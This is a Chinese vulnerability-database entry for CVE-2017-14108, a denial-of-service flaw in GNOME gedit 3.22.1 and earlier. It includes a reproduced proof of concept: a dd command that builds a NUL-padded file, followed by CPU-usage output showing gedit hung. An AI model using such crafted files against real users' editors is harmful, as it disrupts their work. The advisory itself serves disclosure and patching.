GNOME gedit 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1134535 漏洞类型 资源管理错误
发布时间 2017-09-02 更新时间 2019-10-23
CVE编号 CVE-2017-14108 CNNVD-ID CNNVD-201709-018
漏洞平台 N/A CVSS评分 7.1
|漏洞来源
https://cxsecurity.com/issue/WLB-2017090008
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201709-018
|漏洞详情
GNOME gedit是GNOME项目的一款文本编辑器。 GNOME gedit 3.22.1及之前的版本中的libgedit.a文件存在安全漏洞。远程攻击者可借助以多个‘’元字符开头的文件利用该漏洞造成拒绝服务(CPU消耗)。
|漏洞EXP
################
#Title: libgedit.a mishandling NUL Blocks in gedit(GNOME text editor)  
#CWE: CWE-400
#CVE: CVE-2017-14108
#Exploit Author: Hosein Askari 
#Vendor HomePage: https://gnome.org , https://wiki.gnome.org/Apps/Gedit
#Version : All Version (3.22.1 and older version)
#Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)
#Date: 01-09-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) via a file that begins with many '\0' characters.
###############
sudo echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt
################
POC:
constantine@constantine:~$ pidstat -h -r -u -v -p 3107
Linux 4.4.0-93-generic (constantine) 	۱۷/۰۹/۰۱ 	_i686_	(2 CPU)

#      Time   UID       PID    %usr %system  %guest   %wait    %CPU   CPU  minflt/s  majflt/s     VSZ     RSS   %MEM threads   fd-nr  Command
 1504280041  1000      3107   16.43    0.01    0.00    0.03   106.44     1     15.53      0.00  121296   38804   0.95       4      18  gedit

constantine@constantine:~$ top
  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                              
 3107 constan+  20   0  128884  38492  28320 R 106.7  0.9   0:17.76 gedit 
################
|参考资料

来源:MISC
链接:https://cxsecurity.com/issue/WLB-2017090008
来源:MISC
链接:https://packetstormsecurity.com/files/143983/libgedit.a-3.22.1-Denial-Of-Service.html